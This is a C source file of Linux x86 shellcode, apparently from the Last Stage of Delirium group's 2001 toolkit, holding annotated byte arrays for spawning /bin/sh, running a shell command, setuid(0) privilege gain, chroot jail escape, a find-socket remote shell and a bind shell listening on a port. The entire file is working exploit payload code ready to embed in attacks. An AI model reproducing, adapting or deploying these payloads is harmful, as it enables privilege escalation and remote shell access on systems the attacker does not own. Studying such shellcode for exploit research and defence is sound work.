/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for linux (redhat 6.2) x86                                     #*/

/*
syscall     %eax %ebx,%ecx,%edx
----------- ---- ---------------------------------------------------------------
exec        x00b ->path="/bin//sh",->[->a0=path,0]
exec        x00b ->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 uid=0
mkdir       x027 ->path="b..",mode=0 (each value is valid)
chroot      x03d ->path={"b..","."}
chdir       x00c ->path=".."
socketcall  x066 getpeername=7,->[sfd,->sadr=[],->[len=0x10]]
socketcall  x066 socket=1,->[AF_INET=2,SOCK_STREAM=2,prot=0]
socketcall  x066 bind=2,->[sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10]
socketcall  x066 listen=4,->[sfd,backlog=102]
socketcall  x066 accept=5,->[sfd,0,0]
dup2        x03f sfd,fd={2,1,0}
*/

#if defined(X86) && defined(LINUX)

char shellcode[]=          /* 24 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

char cmdshellcode[]=       /* 40+cmdlen bytes                */
    "\xeb\x22"             /* jmp     <cmdshellcode+36>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd9\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;

char setuidcode[]=         /* 8 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

char chrootcode[]=         /* 37 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""bb.."           /* pushl   $0x2e2e6262            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x43"                 /* incl    %ebx                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb0\x27"             /* movb    $0x27,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x43"                 /* incl    %ebx                   */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xfa"             /* loop    <chrootcode+21>        */
    "\x43"                 /* incl    %ebx                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

char findsckcode[]=        /* 72 bytes                       */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x8d\x77\x10"         /* leal    0x10(%edi),%esi        */
    "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
    "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx        */
    "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
    "\xb3\x10"             /* movb    $0x10,%bl              */
    "\x89\x19"             /* movl    %ebx,(%ecx)            */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x89\x0f"             /* movl    %ecx,(%edi)            */
    "\x51"                 /* pushl   %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\xb3\x07"             /* movb    $0x07,%bl              */
    "\x89\xf9"             /* movl    %edi,%ecx              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x39\xd8"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+54>       */
    "\x66\xb8\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x46\x02"     /* cmpw    %bx,0x2(%esi)          */
    "\x74\x02"             /* je      <findsckcode+56>       */
    "\xe2\xe0"             /* loop    <findsckcode+24>       */
    "\x89\xcb"             /* movl    %ecx,%ebx              */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3f"             /* movb    $0x3f,%al              */
    "\x49"                 /* decl    %ecx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf6"             /* loop    <findsckcode+62>       */
;

char bindsckcode[]=        /* 73 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x6a\x01"             /* pushb   $0x01                  */
    "\x6a\x02"             /* pushb   $0x02                  */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x43"                 /* incl    %ebx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x43"                 /* incl    %ebx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\xb3\x04"             /* movb    $0x04,%bl              */
    "\x89\x44\x24\x04"     /* movl    %eax,0x4(%esp)         */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x83\xc4\x0c"         /* addl    $0x0c,%esp             */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x43"                 /* incl    %ebx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x89\xc3"             /* movl    %eax,%ebx              */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3f"             /* movb    $0x3f,%al              */
    "\x49"                 /* decl    %ecx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf6"             /* loop    <bindsckcode+63>       */
;

#define FINDSCKPORTOFS     46
#define BINDSCKPORTOFS     06

#endif
